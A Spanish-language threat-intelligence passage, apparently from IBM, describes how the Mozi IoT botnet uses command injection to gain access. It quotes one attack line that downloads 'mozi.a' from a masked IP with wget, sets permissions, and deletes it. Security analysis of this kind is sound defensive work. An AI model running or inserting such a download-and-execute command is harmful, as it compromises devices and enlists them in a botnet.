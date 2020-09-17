Casi todos los objetivos de IoT observados por IBM intentaron utilizar ataques CMDi para obtener acceso inicial al dispositivo. Si el endpoint objetivo era un dispositivo IoT y es susceptible a estos ataques, la carga útil se descargó y ejecutó.

Los ataques CMDi son extremadamente populares contra los dispositivos IoT por varias razones. En primer lugar, los sistemas integrados de IoT suelen contener una interfaz web y una interfaz de depuración heredadas del desarrollo del firmware que pueden ser objeto de explotación. En segundo lugar, los módulos PHP integrados en las interfaces web de IoT pueden ser explotados para dar a los actores maliciosos capacidad de ejecución remota. Y en tercer lugar, las interfaces de IoT suelen quedar vulnerables cuando se despliegan porque los administradores no las refuerzan mediante la desinfección de la entrada esperada. Esto permite a los actores de amenazas entrada comandos de shell como "wget".

Nuestro análisis reveló que la botnet Mozi aprovecha CMDi mediante el uso de un comando de shell "wget", y luego altera los permisos para permitir que el actor de amenazas interactúe con el sistema afectado. Por ejemplo:

wget http://xxx.xx.xxx.xxx/bins/mozi.a -o /var/tmp/mozi.a; chmod 777 /var/tmp/mozi.a; rm -rf /var/tmp/mozi.a

Si el host fuera vulnerable a CMDi, este comando descargaría y ejecutaría un archivo llamado "mozi.a". Nuestro análisis de esta muestra en particular indica que el archivo se ejecuta en un microprocesador sin arquitectura de etapas interbloqueadas (MIPS). Esta es una extensión que entienden las máquinas que ejecutan una arquitectura de computadora con conjunto de instrucciones reducido (RISC), que prevalece en muchos dispositivos IoT. Una vez que el atacante obtiene acceso completo al dispositivo a través de la botnet, se puede cambiar el nivel de firmware y se puede plantar malware adicional en el dispositivo.

Aunque este ejemplo cita un vector bien conocido, puede seguir siendo eficaz por dos razones principales. En primer lugar, las nuevas vulnerabilidades permiten la actualización constante de los intentos de explotación a través de CMDi, y se puede aprovechar la implementación lenta de parches. En segundo lugar, esta actividad se automatiza fácilmente, lo que permite a los actores de amenazas atacar una amplia franja de dispositivos rápidamente a bajo costo.

La infraestructura de la botnet Mozi parece tener su origen principalmente en China, y representa el 84 % de la infraestructura observada. Este hecho se alinea con otras investigaciones de código abierto sobre la actividad de IoT en 2020.

A continuación se muestra una lista de vulnerabilidades que IBM ha observado que la botnet Mozi intenta explotar: